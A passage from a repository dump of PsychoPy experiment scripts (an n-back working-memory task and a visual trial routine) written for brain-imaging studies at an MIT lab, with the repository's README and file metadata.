height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-6.0)\n image_2=visual.ImageStim(win=win, name='image_2',units=u'pix', \n image='sin', mask=None,\n ori=0, pos=[0,0], size=[256, 256],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-7.0)\n fix2=visual.TextStim(win=win, ori=0, name='fix2',\n text=u'+',\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-8.0)\n \n # Create some handy timers\n globalClock=core.Clock() #to track the time since experiment started\n routineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \n \n #------Prepare to start Routine\"instr\"-------\n t=0; instrClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n #keep track of which components have finished\n instrComponents=[]\n instrComponents.append(text)\n instrComponents.append(key_resp)\n for thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"instr\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*text* updates\n if t>=0.0 and text.status==NOT_STARTED:\n #keep track of start time/frame for later\n text.tStart=t#underestimates by a little under one frame\n text.frameNStart=frameN#exact frame index\n text.setAutoDraw(True)\n \n #*key_resp* updates\n if t>=0.0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"instr\"\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n begExpClock.reset()\n #set up handler to look after randomisation of conditions etc\n varLists=np.loadtxt('conditions.txt',dtype='str',delimiter='\\t') #loads info from conditions file (which should be a .txt not an .xlsx)\n stimList=varLists[:] #chooses column for each category of data\n runLength=(totStimNum/(totRuns-1))\n lefts = []\n rights = []\n if runNum==1:\n pL=0.5\n pR=0.5\n elif runNum>1:\n pL=counterbalance[runNum-2]\n pR=(1-pL)\n for i in range(int(pL*len(varLists))):\n lefts.append([-256, 0])\n for i in range(int(pR*len(varLists))):\n rights.append([256, 0])\n direction = lefts + rights\n direction = np.asarray(direction)\n seed(int(expInfo['participant'])+65) #seeds randomization based on participant number\n shuffle(stimList) #shuffles/randomizes list based on above seed\n seed(int(expInfo['participant'])+89) #seeds randomization based on participant number\n shuffle(direction)\n if runNum==1: #practice run\n currStims=stimList[(len(stimList)-10):len(stimList)] #picks the first 10 stims for practice round\n currDirection=direction[(len(stimList)-10):len(stimList)] #picks the first 10 stims for practice round\n elif runNum==2:\n currStims=stimList[0:runLength] #picks a subset from the randomized list of total stims\n currDirection=direction[0:runLength]\n elif runNum>2:\n currStims=stimList[((runNum-2)*runLength):((runNum-1)*runLength)]\n currDirection=direction[0:runLength]\n\n print currDirection\n myarray = []\n for i in range(len(currStims)):\n myarray.append({'stim': currStims[i], 'pos': currDirection[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n trials=data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\n thisExp.addLoop(trials)#add the loop to the experiment\n thisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n for thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n# durr1 = randint(3,8)\n# durr2 = randint(3,8)\n durr1=1\n durr2=2\n image.setImage(stim)\n key_resp_2 = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp_2.status=NOT_STARTED\n image_2.setPos(pos)\n image_2.setImage(stim)\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(image)\n trialComponents.append(key_resp_2)\n trialComponents.append(RorL)\n trialComponents.append(fix1)\n trialComponents.append(image_2)\n trialComponents.append(fix2)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n \n \n \n #*image* updates\n if t>=0.0 and image.status==NOT_STARTED:\n #keep track of start time/frame for later\n image.tStart=t#underestimates by a little under one frame\n image.frameNStart=frameN#exact frame index\n image.setAutoDraw(True)\n stimOn=begExpClock.getTime()\n elif image.status==STARTED and t>=(0.0+2):\n image.setAutoDraw(False)\n \n #*key_resp_2* updates\n if t>=0.0 and key_resp_2.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp_2.tStart=t#underestimates by a little under one frame\n key_resp_2.frameNStart=frameN#exact frame index\n key_resp_2.status=STARTED\n #keyboard checking is just starting\n trialResponseTime='NaN'\n trialResponseKey=[]\n key_resp_2.clock.reset() # now t=0\n event.clearEvents()\n RTclock.reset()\n elif key_resp_2.status==STARTED and t>=(0.0+2):\n key_resp_2.status=STOPPED\n if key_resp_2.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1', '2', '9', '0'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp_2.keys=theseKeys[-1]#just the last key pressed\n key_resp_2.rt = key_resp_2.clock.getTime()\n trialResponseTime=RTclock.getTime()\n trialResponseKey=theseKeys[-1]\n \n #*RorL* updates\n if t>=0.0 and RorL.status==NOT_STARTED:\n #keep track of start time/frame for later\n RorL.tStart=t#underestimates by a little under one frame\n RorL.frameNStart=frameN#exact frame index\n RorL.setAutoDraw(True)\n elif RorL.status==STARTED and t>=(0.0+2):\n RorL.setAutoDraw(False)\n \n #*fix1* updates\n if t>=2 and fix1.status==NOT_STARTED:\n #keep track of start time/frame for later\n fix1.tStart=t#underestimates by a little under one frame\n fix1.frameNStart=frameN#exact frame index\n fix1.setAutoDraw(True)\n elif fix1.status==STARTED and t>=(2+durr1):\n fix1.setAutoDraw(False)\n \n #*image_2* updates\n if t>=(durr1+2) and image_2.status==NOT_STARTED:\n #keep track of start time/frame for later\n image_2.tStart=t#underestimates by a little under one frame\n image_2.frameNStart=frameN#exact frame index\n image_2.setAutoDraw(True)\n elif image_2.status==STARTED and t>=((durr1+2)+0.5):\n image_2.setAutoDraw(False)\n \n #*fix2* updates\n if t>=durr1+2.5 and fix2.status==NOT_STARTED:\n #keep track of start time/frame for later\n fix2.tStart=t#underestimates by a little under one frame\n fix2.frameNStart=frameN#exact frame index\n fix2.setAutoDraw(True)\n elif fix2.status==STARTED and t>=(durr1+2.5+durr2):\n fix2.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n \n \n \n #check responses\n if len(key_resp_2.keys)==0: #No response was made\n key_resp_2.keys=None\n #store data for trials (TrialHandler)\n trials.addData('key_resp_2.keys',key_resp_2.keys)\n if key_resp_2.keys != None:#we had a response\n trials.addData('key_resp_2.rt',key_resp_2.rt)\n thisExp.nextEntry()\n \n #completed 1 repeats of 'trials'\n if trialResponseKey==[]: #No response was made\n trialResponseKey=None\n trials.addData('respKey', trialResponseKey)\n if trialResponseKey != []:#we had a response\n trials.addData('RT',trialResponseTime)\n if any(pos==-256):\n location='L'\n elif any(pos==256):\n location='R'\n respLoc='None'\n respSize='None'\n if trialResponseKey=='1':\n respLoc='Left'\n respSize='Smaller'\n elif trialResponseKey=='2':\n respLoc='Left'\n respSize='Larger'\n elif trialResponseKey=='9':\n respLoc='Right'\n respSize='Smaller'\n elif trialResponseKey=='0':\n respLoc='Right'\n respSize='Larger'\n if location=='L' and respLoc=='Left':\n corr='correct'\n elif location=='R' and respLoc=='Right':\n corr='correct'\n else:\n corr='incorrect'\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,runNum,'%s/%s',stim,location,stimOn,respLoc,corr,respSize,trialResponseTime)%(pL,pR))\n# get names of stimulus parameters\n if trials.trialList in ([], [None], None): params=[]\n else: params = trials.trialList[0].keys()\n runNum=runNum+1\n\n\n#save data for this loop\n#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\n#trials.saveAsExcel(filename+'.xlsx', sheetName='trials',\n# stimOut=params,\n# dataOut=['n','all_mean','all_std', 'all_raw'])\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6020861864089966,
"alphanum_fraction": 0.637418806552887,
"avg_line_length": 44.48139572143555,
"blob_id": "936a0e3c397ccddbf47b5535481d7065b6f12bc8",
"content_id": "64088692c7ed575bf3e3a783bbc98277e53f626d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19557,
"license_type": "no_license",
"max_line_length": 430,
"num_lines": 430,
"path": "/n-back.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Fri May 24 16:40:14 2013\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='n-back_skeleton'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'1'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_%s_%s' %(expInfo['participant'], expInfo['session'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=False, saveWideText=True,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_%s_n-back.txt' %(expInfo['participant'], expInfo['session']),'a')\ndatFile.write('Trial\\tBlockNum\\tRun\\tn-back\\tResponse\\tTargets\\tHits\\tMisses\\tFAs\\tCRs\\tstimOnset\\tRT\\tposition\\tInstructionOnset\\n')\n\n#setup the Window\nwin = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'black', colorSpace=u'rgb')\n\n#Initialise components for Routine \"scanner\"\nscannerClock=core.Clock()\nwaiting=visual.TextStim(win=win, ori=0, name='waiting',\n text='Waiting for scanner...',\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"instr\"\ninstrClock=core.Clock()\ninstructions=visual.TextStim(win=win, ori=0, name='instructions',\n text='nonsense',\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\nsquare=visual.PatchStim(win=win, name='square',\n tex='sqr', mask=None,\n ori=0, pos=[0,0], size=[0.1, 0.1], sf=None, phase=0.0,\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\n\n#Initialise components for Routine \"rest\"\nrestClock=core.Clock()\nfix=visual.TextStim(win=win, ori=0, name='fix',\n text=u'+',\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\nroutineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \nbegExpClock=core.Clock() #to track the time since the actual paradigm started (after the 'Wating for scanner' screen)\n\n#------Prepare to start Routine\"scanner\"-------\nt=0; scannerClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\nsync_pulse = event.BuilderKeyResponse() #create an object of type KeyResponse\nsync_pulse.status=NOT_STARTED\n#keep track of which components have finished\nscannerComponents=[]\nscannerComponents.append(waiting)\nscannerComponents.append(sync_pulse)\nfor thisComponent in scannerComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"scanner\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=scannerClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*waiting* updates\n if t>=0.0 and waiting.status==NOT_STARTED:\n #keep track of start time/frame for later\n waiting.tStart=t#underestimates by a little under one frame\n waiting.frameNStart=frameN#exact frame index\n waiting.setAutoDraw(True)\n \n #*sync_pulse* updates\n if t>=0.0 and sync_pulse.status==NOT_STARTED:\n #keep track of start time/frame for later\n sync_pulse.tStart=t#underestimates by a little under one frame\n sync_pulse.frameNStart=frameN#exact frame index\n sync_pulse.status=STARTED\n #keyboard checking is just starting\n sync_pulse.clock.reset() # now t=0\n event.clearEvents()\n if sync_pulse.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['+', 'num_add', 'return'])\n if len(theseKeys)>0:#at least one key was pressed\n sync_pulse.keys=theseKeys[-1]#just the last key pressed\n sync_pulse.rt = sync_pulse.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in scannerComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"scanner\"\nfor thisComponent in scannerComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#set up handler to look after randomisation of conditions etc\nif expInfo['session']=='1':\n run=[1,2,1,2,2,1,2,1,1]\nelif expInfo['session']=='2':\n run=[2,2,1,1,1,2,2,1,2]\nmyarray = []\nfor i in range(len(run)):\n myarray.append({'run': run[i], 'runNum': (i)}) #puts data into an array of dictionaries that the TrialHandler function will accept\nblock=data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='block')\nthisExp.addLoop(block)#add the loop to the experiment\nthisBlock=block.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisBlock.rgb)\nif thisBlock!=None:\n for paramName in thisBlock.keys():\n exec(paramName+'=thisBlock.'+paramName)\nbegExpClock.reset()\nfor thisBlock in block:\n currentLoop = block\n #abbrieviate parameter names if possible (e.g. rgb=thisBlock.rgb)\n if thisBlock!=None:\n for paramName in thisBlock.keys():\n exec(paramName+'=thisBlock.'+paramName)\n \n #------Prepare to start Routine\"instr\"-------\n t=0; instrClock.reset() #clock \n frameN=-1\n routineTimer.add(2.000000)\n #update component parameters for each repeat\n instructions.setText(u\"This is a %s-back\"%(run))\n #keep track of which components have finished\n instrComponents=[]\n instrComponents.append(instructions)\n for thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"instr\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*instructions* updates\n if t>=0.0 and instructions.status==NOT_STARTED:\n #keep track of start time/frame for later\n instructions.tStart=t#underestimates by a little under one frame\n instructions.frameNStart=frameN#exact frame index\n instructions.setAutoDraw(True)\n instrOn=begExpClock.getTime()\n elif instructions.status==STARTED and t>=(0.0+2.0):\n instructions.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"instr\"\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n \n #set up handler to look after randomisation of conditions etc\n allPos=[[0,0.75],[0.257, 0.705],[0.482,0.575],[0.65,0.375],[0.739,0.13],[0.739,-0.13],[0.65,-0.375],[0.482,-0.575],[0.257,-0.705],[0,-0.75],[-0.257, 0.705],[-0.482,0.575],[-0.65,0.375],[-0.739,0.13],[-0.739,-0.13],[-0.65,-0.375],[-0.482,-0.575],[-0.257,-0.705]]\n if expInfo['session']=='1':\n allOrders=[[0,1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0],[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0],[0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0],[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0],[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1],[0,0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1],[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1],[0,0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0],[0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0]]\n #123,231,213\n seed(runNum)\n shuffle(allPos)\n elif expInfo['session']=='2':\n allOrders=[[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0],[0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1],[0,0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0],[0,1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1],[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0],[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1],[0,0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0]]\n #321,132,312\n seed(runNum+42)\n shuffle(allPos)\n order=allOrders[runNum]\n position=[]\n if run==1:\n for i in range(len(order)):\n if order[i]==0:\n position.append(allPos[i])\n elif order[i]==1:\n position.append(allPos[i-1])\n elif run==2:\n for i in range(len(order)):\n if order[i]==0:\n position.append(allPos[i])\n elif order[i]==1:\n position.append(allPos[i-2])\n elif run==3:\n for i in range(len(order)):\n if order[i]==0:\n position.append(allPos[i])\n elif order[i]==1:\n position.append(allPos[i-3])\n print position\n myarray = []\n for i in range(len(position)):\n myarray.append({'pos': position[i], 'order': order[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n trials=data.TrialHandler(nReps=1, method='sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\n thisExp.addLoop(trials)#add the loop to the experiment\n thisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n for thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n routineTimer.add(2.000000)\n #update component parameters for each repeat\n square.setPos(pos)\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(square)\n trialComponents.append(key_resp)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*square* updates\n if t>=0.0 and square.status==NOT_STARTED:\n #keep track of start time/frame for later\n square.tStart=t#underestimates by a little under one frame\n square.frameNStart=frameN#exact frame index\n square.setAutoDraw(True)\n stimOn=begExpClock.getTime()\n elif square.status==STARTED and t>=(0.0+0.5):\n square.setAutoDraw(False)\n \n #*key_resp* updates\n if t>=0.0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n elif key_resp.status==STARTED and t>=(0.0+2.0):\n key_resp.status=STOPPED\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n #check responses\n if len(key_resp.keys)==0: #No response was made\n key_resp.keys=None\n #store data for trials (TrialHandler)\n trials.addData('key_resp.keys',key_resp.keys)\n if key_resp.keys != None:#we had a response\n trials.addData('key_resp.rt',key_resp.rt)\n thisExp.nextEntry()\n\n #completed 1 repeats of 'trials'\n if order==1 and key_resp.keys=='1':\n [hit,miss,FA,CR]=[1,0,0,0]\n elif order==0 and key_resp.keys=='1':\n [hit,miss,FA,CR]=[0,0,1,0]\n elif order==1 and key_resp.keys==None:\n [hit,miss,FA,CR]=[0,1,0,0]\n elif order==0 and key_resp.keys==None:\n [hit,miss,FA,CR]=[0,0,0,1]\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,runNum+1,expInfo['session'],run,key_resp.keys,order,hit,miss,FA,CR,stimOn,key_resp.rt,pos,instrOn))\n# print 'trial=%s,block=%s,run=%s,n-back=%s,resp=%s,targ=%s,RT=%s'%(trials.thisTrialN+1,runNum+1,expInfo['session'],run,key_resp.keys,order,key_resp.rt)\n #save data for this loop\n# trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\n \n #------Prepare to start Routine\"rest\"-------\n t=0; restClock.reset() #clock \n frameN=-1\n routineTimer.add(15.000000)\n# routineTimer.add(3.000000)\n #update component parameters for each repeat\n #keep track of which components have finished\n restComponents=[]\n restComponents.append(fix)\n for thisComponent in restComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"rest\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=restClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*fix* updates\n if t>=0.0 and fix.status==NOT_STARTED:\n #keep track of start time/frame for later\n fix.tStart=t#underestimates by a little under one frame\n fix.frameNStart=frameN#exact frame index\n fix.setAutoDraw(True)\n elif fix.status==STARTED and t>=(0.0+15.0):\n fix.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in restComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"rest\"\n for thisComponent in restComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'block'\n\n\n#save data for this loop\n#block.saveAsPickle(filename+'block', fileCollisionMethod='rename')\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.7947598099708557,
"alphanum_fraction": 0.7947598099708557,
"avg_line_length": 113.5,
"blob_id": "e67e4361f36c3ee228e3757451b4e6a3cd776704",
"content_id": "8197074baa526008db8258dd139b0eb0f8365e6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 458,
"license_type": "no_license",
"max_line_length": 284,
"num_lines": 4,
"path": "/README.md",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "# gablab-psychopy-tasks\nWhile working at the [Gabrieli lab](http://gablab.mit.edu/) at MIT, I programmed several tasks for brain imaging and behavioral experiments. I used open-source software called [Psychopy](http://www.psychopy.org/), which provides tools for building psychological experiments in Python.\n\nThese tasks will not run in their current form, as the experimental stimuli they draw on are not provided here and I no longer have access to them.\n"
},
{
"alpha_fraction": 0.6508645415306091,
"alphanum_fraction": 0.6740362644195557,
"avg_line_length": 42.55555725097656,
"blob_id": "eaa9ba64f6069635bf176b1317d94e1f647d9908",
"content_id": "69afbce2a151a172cc60b7a911e768b962e9e07c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14112,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 324,
"path": "/SART.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
